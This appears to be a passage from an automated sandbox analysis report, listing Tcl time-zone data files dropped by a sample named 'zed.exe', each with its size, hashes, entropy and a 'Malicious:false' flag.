                                                                                                                                                                                                                                            SHA-512:53DCC6DF7C3E0B00A6D98A8DCC4988C8CFD6B53CC89E6F8D32DA41CB532A62D9C6A823675C5039F5639CE0D423F6D571F46F5B93FFC7EFFB4EDFFBF89D46AA12
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Nairobi) {.. {-9223372036854775808 8836 0 LMT}.. {-1946168836 9000 0 +0230}.. {-1309746600 10800 0 EAT}.. {-1261969200 9000 0 +0230}.. {-1041388200 9900 0 +0245}.. {-865305900 10800 0 EAT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                                            Entropy (8bit):4.856754881865487
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2DjUfDm2OHNseoH1axCXFHzaSmkFWTvF9:MB862DjULmdHPC1XNzaS3yz
                                                                                                                                                                                                                                            MD5:EDB548348E590C8CFE04ED172D96B86C
                                                                                                                                                                                                                                            SHA1:AD3B631FB03819772164402E202AFA781687F597
                                                                                                                                                                                                                                            SHA-256:9ADA5F5AFB25E823E1F0E8AD2489AAA1C09F01356634A9403670D7AB21CA2E2C
                                                                                                                                                                                                                                            SHA-512:17E396A9BE497077B774AD1108CC8760ED35FC92F65FFF070F9ACD3C4FB67A335C1C57DF1CCB1570DE14B708EFCA0063990A969E30759C9A47731DA45ED25EFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ndjamena) {.. {-9223372036854775808 3612 0 LMT}.. {-1830387612 3600 0 WAT}.. {308703600 7200 1 WAST}.. {321314400 3600 0 WAT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.871519187180041
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcdhA9Ff2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dsh2f2D1
                                                                                                                                                                                                                                            MD5:0134039CD1666E983A9B6E43ABD6AF59
                                                                                                                                                                                                                                            SHA1:A2A99345390F4D17C892CEADE58C604257686764
                                                                                                                                                                                                                                            SHA-256:B517120AD8DB3F21EAB4E44A78001EE856EB4EA35852C54CCA96D38887DEBCFA
                                                                                                                                                                                                                                            SHA-512:E5911ADD3D776D87ACFC986C4D2564E3ED9AB12C67F23391ED35FF2A31AD8314B873E31DB8DA4D5E0DAEA12BE34110A8F0C27C9C6126977BAD51C6AD5CDFA39B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Niamey) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.909962899502589
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcboGb+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dqbb+c
                                                                                                                                                                                                                                            MD5:550E482599C2F4280F2C258019BB2547
                                                                                                                                                                                                                                            SHA1:A39045BEF313094CEDC100A7D695AE51BC9E498D
                                                                                                                                                                                                                                            SHA-256:64CAF2BF9D45095DF97F419714D5617CF6300ACDB544B621DCE1D594AA9B910C
                                                                                                                                                                                                                                            SHA-512:4FD29C5B4C0D2BDE69C437E9BF4F08A11E1DAAA689B69F28F3551F550BDCCDD055E4C1A241EDB2FA48B18825AFF792F4860F55983E106EA8224F1D87ED4F7546
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Nouakchott) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.920023025906233
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXCZDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2D1DBS
                                                                                                                                                                                                                                            MD5:6CFC4E938E50C9B591F8CC42A14FA82A
                                                                                                                                                                                                                                            SHA1:FCE14A5CA62C9005C76D27B849A238E76C834F8A
                                                                                                                                                                                                                                            SHA-256:03B9C1FE350B5E9F6F333F9519FA394DCC562308D9388A903AF3D3FECEBDC762
                                                                                                                                                                                                                                            SHA-512:98F22F1D23A9930276A2D306A1473E64DC43547A16CFD01226E4F030A26A3CC4FDED77F790583CC5C078FC6DFCCE81C16A50879AE46A0D3A6F1FA98373F413C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Ouagadougou) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.893842293207225
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcyTKM0DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DQD4yn
                                                                                                                                                                                                                                            MD5:6D979FCD225D5431C7391AE568C6409F
                                                                                                                                                                                                                                            SHA1:6C9DCD222061CC00FD386773C6BB2861F3429A60
                                                                                                                                                                                                                                            SHA-256:8FB8692DB9281AE2B087D704168BFD47D3D0901781FEF65BFD62FCB213BA6B50
                                                                                                                                                                                                                                            SHA-512:32AFA6AF6BFC3D42CA636DD2B96906048EF1ADFBB135BB7E7B77C444FED99FDABB84FBBADF56EC63828FFA7B3371191FF1311822B1C75241EBD9CF602467088E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Porto-Novo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):234
                                                                                                                                                                                                                                            Entropy (8bit):4.818597723513168
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2DXDm2OHH5oHvzdoH1aNbbFHRMy:MB862DTmdHH5CvzdC16bZRMy
                                                                                                                                                                                                                                            MD5:28A5967C797F4B38FB63F823D6F07168
                                                                                                                                                                                                                                            SHA1:17872E91683B884191D2E4C777FB79DCE6D73EE7
                                                                                                                                                                                                                                            SHA-256:BA1D60DF2B41320F92A123A714E17E576C89383526B96E0541A464C3FBA415B7
                                                                                                                                                                                                                                            SHA-512:B335E3D3268631F3A71F4BAD59740F3A5222344E8223C201B8FE885BAA7F1A550FA7778E498D6DC2111F41053856F50B21413AECCE84B80833EC8176F2A1009C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Sao_Tome) {.. {-9223372036854775808 1616 0 LMT}.. {-2713912016 -2205 0 LMT}.. {-1830384000 0 0 GMT}.. {1514768400 3600 0 WAT}.. {1546304400 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.905303708777235
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcHdDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwdDBS
                                                                                                                                                                                                                                            MD5:F2D7F7BC4EA3629EC7F0E45300A0CFD2
                                                                                                                                                                                                                                            SHA1:E7594D378C5DCFEB1E87E13AC79A026260D2E630
                                                                                                                                                                                                                                            SHA-256:9D8009ACAB019B32B1E87AB10E0AC3765ABCABE8066318DA8CA4905D41562F72
                                                                                                                                                                                                                                            SHA-512:795E58172907020C85CF0B10BBA35842D5F92872CCB3382DFDC787BAA504C79927FA23BC3104AD63541A95C44CA80977E8247846DE918A0B00963B970F4823D2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Timbuktu) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):954
                                                                                                                                                                                                                                            Entropy (8bit):4.151253074491018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862DrmdHrCDWR+f7Zn9ueRSmNvlTtuyI/ZBv8dq8Jw4VFZBZYEuAENSfp8kSYx:5veuDkWx3NdT18kbjjAkxTx
                                                                                                                                                                                                                                            MD5:2DF9B050D82B06EB89DA908C31C1F1C9
                                                                                                                                                                                                                                            SHA1:CB294E12560A98D5CEA3BA7004B5519B6C22BAAC
                                                                                                                                                                                                                                            SHA-256:B447B6B1C351E77F22A2D77C0437F2BBB7D8BDFDFDC3D6285E0D260519CC7110
                                                                                                                                                                                                                                            SHA-512:BBE281D551E9F8DA7B6BB08D809177615410A11E4B1184ABD220EA8B1F355B2BBC090C6BAAF7E07FD61286891388ECD4026D4433C4E4B6A8D201F8D95E174532
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tripoli) {.. {-9223372036854775808 3164 0 LMT}.. {-1577926364 3600 0 CET}.. {-574902000 7200 1 CEST}.. {-512175600 7200 1 CEST}.. {-449888400 7200 1 CEST}.. {-347158800 7200 0 EET}.. {378684000 3600 0 CET}.. {386463600 7200 1 CEST}.. {402271200 3600 0 CET}.. {417999600 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {465429600 3600 0 CET}.. {481590000 7200 1 CEST}.. {496965600 3600 0 CET}.. {512953200 7200 1 CEST}.. {528674400 3600 0 CET}.. {544230000 7200 1 CEST}.. {560037600 3600 0 CET}.. {575852400 7200 1 CEST}.. {591660000 3600 0 CET}.. {607388400 7200 1 CEST}.. {623196000 3600 0 CET}.. {641775600 7200 0 EET}.. {844034400 3600 0 CET}.. {860108400 7200 1 CEST}.. {875919600 7200 0 EET}.. {1352505600 3600 0 CET}.. {1364515200 7200 1 CEST}.. {1382662800 7200 0 EET}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):4.150944563639585
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862DHmdHjCvbB/lxRjntMVyoKCyFWeey0XSe/OSyHaCgmvLOcSFQSFeSTC6ZPJ:5LemvbplxRhbv+yuh2tIee6kvcw9Cy
                                                                                                                                                                                                                                            MD5:0C99335A41D33AA8BC1EDA0CB4CDCBF5
                                                                                                                                                                                                                                            SHA1:5CABC28D318FA5B8307429EA571FFF91EB8E1252
                                                                                                                                                                                                                                            SHA-256:0760D1028E733888E43E7F1E057217DC2B52786029FCEC67B27EB69CC6A54938
                                                                                                                                                                                                                                            SHA-512:C8FE685ACA46FD4836F3AABC15833F294E5EBED123A487D04E74A8C5668BDFAFB96D2326760452A6E5A1B9CC25AC6C3918D8C10A7F8EF737456640E3000BBA2F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tunis) {.. {-9223372036854775808 2444 0 LMT}.. {-2797202444 561 0 PMT}.. {-1855958961 3600 0 CET}.. {-969242400 7200 1 CEST}.. {-950493600 3600 0 CET}.. {-941940000 7200 1 CEST}.. {-891136800 3600 0 CET}.. {-877827600 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-842918400 3600 0 CET}.. {-842223600 7200 1 CEST}.. {-828230400 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796269600 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766634400 3600 0 CET}.. {231202800 7200 1 CEST}.. {243903600 3600 0 CET}.. {262825200 7200 1 CEST}.. {276044400 3600 0 CET}.. {581122800 7200 1 CEST}.. {591145200 3600 0 CET}.. {606870000 7200 1 CEST}.. {622594800 3600 0 CET}.. {641516400 7200 1 CEST}.. {654649200 3600 0 CET}.. {1114902000 7200 1 CEST}.. {1128038400 3600 0 CET}.. {1143334800 7200 1 CEST}.. {1162083600 3600 0 CET}.. {11747
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1649
                                                                                                                                                                                                                                            Entropy (8bit):3.9974091170263066
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5t+Lmcz0iMHHWMbnHoMcHiM0H+MCySHr/MDHqMafHO8MwHJMHHOMHSHWMHHXM5Hs:OLjQDI6jZ2WFcv
                                                                                                                                                                                                                                            MD5:4846FB13467BA93EB134D88228D7F534
                                                                                                                                                                                                                                            SHA1:477FC6144B7DF365606A2E44EF1430F8DF6FB841
                                                                                                                                                                                                                                            SHA-256:DFC3D1FC182B315B31D999BC103C264BD205EB16F971C8636003A71170D7BD7C
                                                                                                                                                                                                                                            SHA-512:A719F5083F66CE44FE047880A10B2ED04B66E01C7F0F7DADAE2FFB95172308F091D669BCFED5A236D2A0F80A4A1D78DA7A778DDE3FAECB40170ECDA705573769
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Windhoek) {.. {-9223372036854775808 4104 0 LMT}.. {-2458170504 5400 0 +0130}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {637970400 7200 0 CAT}.. {764200800 3600 1 WAT}.. {778640400 7200 0 CAT}.. {796780800 3600 1 WAT}.. {810090000 7200 0 CAT}.. {828835200 3600 1 WAT}.. {841539600 7200 0 CAT}.. {860284800 3600 1 WAT}.. {873594000 7200 0 CAT}.. {891734400 3600 1 WAT}.. {905043600 7200 0 CAT}.. {923184000 3600 1 WAT}.. {936493200 7200 0 CAT}.. {954633600 3600 1 WAT}.. {967942800 7200 0 CAT}.. {986083200 3600 1 WAT}.. {999392400 7200 0 CAT}.. {1018137600 3600 1 WAT}.. {1030842000 7200 0 CAT}.. {1049587200 3600 1 WAT}.. {1062896400 7200 0 CAT}.. {1081036800 3600 1 WAT}.. {1094346000 7200 0 CAT}.. {1112486400 3600 1 WAT}.. {1125795600 7200 0 CAT}.. {1143936000 3600 1 WAT}.. {1157245200 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8447
                                                                                                                                                                                                                                            Entropy (8bit):3.867931581740766
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:6hvOs5vveFaHU6lgqN/zNMkixlrxYTMcmo1LWF59:6hvOstgqN/zNMkArxiZmf
                                                                                                                                                                                                                                            MD5:DF52E726B33FA47EB115C1233614E101
                                                                                                                                                                                                                                            SHA1:26B0E49022FCB929F0160617F9C9D2DBEDC63610
                                                                                                                                                                                                                                            SHA-256:77231D179260C08690A70AEE6C2517E4B621ED4794D9AEEA7040539F4FF05111
                                                                                                                                                                                                                                            SHA-512:48AAF25419E07B06E076B0E19F9A0C27EB257556E62FD8F7B2AA963A817823DD89D33AB6AFEAAC2EF2230361D76776355E19CC2BBBB4D19536F823A347AC8AA4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Adak) {.. {-9223372036854775808 44002 0 LMT}.. {-3225223727 -42398 0 LMT}.. {-2188944802 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8685
                                                                                                                                                                                                                                            Entropy (8bit):3.9620252256806845
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:esKLO6KLC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:etLhN9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:BFEACEA04AAA8A69A9AC71CF86BCC15C
                                                                                                                                                                                                                                            SHA1:1693971B8AAA35021BA34799FB1B9FADC3DA0294
                                                                                                                                                                                                                                            SHA-256:DE7FBE2B3ED780C6B82099E1E249DD41F4452A3ADB9DD807B1D0EC06049C2302
                                                                                                                                                                                                                                            SHA-512:E94112A2A5F268C03C58CE3BB4C243B2B9B0FC17CB27FDD58BCD2CCC8D377B805C87A552AE7DE1C5698C5F2C4B0FCAB00A3420B1DAD944C1A2F7A47CE7118F78
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Anchorage) {.. {-9223372036854775808 50424 0 LMT}.. {-3225223727 -35976 0 LMT}.. {-2188951224 -36000 0 AST}.. {-883576800 -36000 0 AST}.. {-880200000 -32400 1 AWT}.. {-769395600 -32400 1 APT}.. {-765378000 -36000 0 AST}.. {-86882400 -36000 0 AHST}.. {-31500000 -36000 0 AHST}.. {-21470400 -32400 1 AHDT}.. {-5749200 -36000 0 AHST}.. {9979200 -32400 1 AHDT}.. {25700400 -36000 0 AHST}.. {41428800 -32400 1 AHDT}.. {57754800 -36000 0 AHST}.. {73483200 -32400 1 AHDT}.. {89204400 -36000 0 AHST}.. {104932800 -32400 1 AHDT}.. {120654000 -36000 0 AHST}.. {126705600 -32400 1 AHDT}.. {152103600 -36000 0 AHST}.. {162388800 -32400 1 AHDT}.. {183553200 -36000 0 AHST}.. {199281600 -32400 1 AHDT}.. {215607600 -36000 0 AHST}.. {230731200 -32400 1 AHDT}.. {247057200 -36000 0 AHST}.. {262785600 -32400 1 AHDT}.. {278506800 -36000 0 AHST}.. {294235200 -3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.908728298285591
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/8J5290ppv:MByMYbpwt290/8m90b
                                                                                                                                                                                                                                            MD5:1C3CE9F156ABECEAA794E8F1F3A7ADDB
                                                                                                                                                                                                                                            SHA1:6F84D0A424FD2DE85E3420EA320A186B277B0295
                                                                                                                                                                                                                                            SHA-256:F38610019C0A2C18AC71F5AA108B9647D9B5C01DCB55211AFB8312308C41FE70
                                                                                                                                                                                                                                            SHA-512:CA2DA6F9551E4DBF775D7D059F6F3399E0C4F2A428699726CD2A1B0BB17CCF5CDEEF645EE1759A2A349F3F29E0343600B89CE1F4659CF5D2B58280A381C018AD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Anguilla) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.898881450964165
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290//MFe90ppv:MByMYbpwt290//V90b
                                                                                                                                                                                                                                            MD5:DB16FFE76D625DEC731AB6320F5EF9BF
                                                                                                                                                                                                                                            SHA1:D286994E03E4F82C08DE094B436FA098648AFADE
                                                                                                                                                                                                                                            SHA-256:561E58E11DC5A86CAE04B5CB40F43EFCFF9ABC0C841FAC094619E9C5E0B403F8
                                                                                                                                                                                                                                            SHA-512:8842B616205378AF78B0B2FC3F6517385845DE30FFD477A21ACFA0060D161FB6462A3C266DCFD54F101729446B8E1B2ECF463C9CF2E6CE227B2628A19AF365F9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Antigua) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1782
                                                                                                                                                                                                                                            Entropy (8bit):3.733307964154526
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5KChlvEw6kSSx5H4a8tf3fkuozd23t8VZDG8+GCRRRd:QIlvEwJSSxdF8tfMuozdCt8VZy8+GCRB
                                                                                                                                                                                                                                            MD5:9B01680A362EA7B462DC236F6A35E14C
                                                                                                                                                                                                                                            SHA1:456A5E771F6B749BFDB2BFD59836A6A930499881
                                                                                                                                                                                                                                            SHA-256:B1327CBEC20A21E3FF873E28A2EDFA271EE3A5C01933779300EABD6B185DA010
                                                                                                                                                                                                                                            SHA-512:E6C2F5C489BEA31B0AAC3CB1DB750AC2B665DAC0AC82C1CE6756E768305300297BA5E3B32EDEB9E1715452F02223E47674C4F2B1844920F664623C9F34309240
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Araguaina) {.. {-9223372036854775808 -11568 0 LMT}.. {-1767214032 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2048
                                                                                                                                                                                                                                            Entropy (8bit):3.7664759014118188
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5p9uuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0wi:jIu3pfe92jCs/VOHv2kdeRtnxafwwfF0
                                                                                                                                                                                                                                            MD5:2B9A1EDE5110B46E24F4726664EA1E3F
                                                                                                                                                                                                                                            SHA1:939D1A7A50544F34B318ACDB52BC6930FE453F6D
                                                                                                                                                                                                                                            SHA-256:BC86AC89121EC4AA302F6259CCC97EFFD7022DC6CEE3B291C57DA72B6EA0C558
                                                                                                                                                                                                                                            SHA-512:C204740DACBCECF2CC5CF4FEB687E86B9150512623203C999D6F4EB5FB246D07681A35C28D8445F6A50F49940C321E0AA5E51FE5A73B8ED076F29CEB5B4D4CA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Buenos_Aires) {.. {-9223372036854775808 -14028 0 LMT}.. {-2372097972 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2077
                                                                                                                                                                                                                                            Entropy (8bit):3.742645155048276
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5/nuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0NC:Vuu3pfe92jCs/VOHv2kdeRtnxafww3mP
                                                                                                                                                                                                                                            MD5:3D2AF5714DFC392ED4BC976784D5A58A
                                                                                                                                                                                                                                            SHA1:9252DE40B6EF872E1D2F7CDD53DDD21145E93C5C
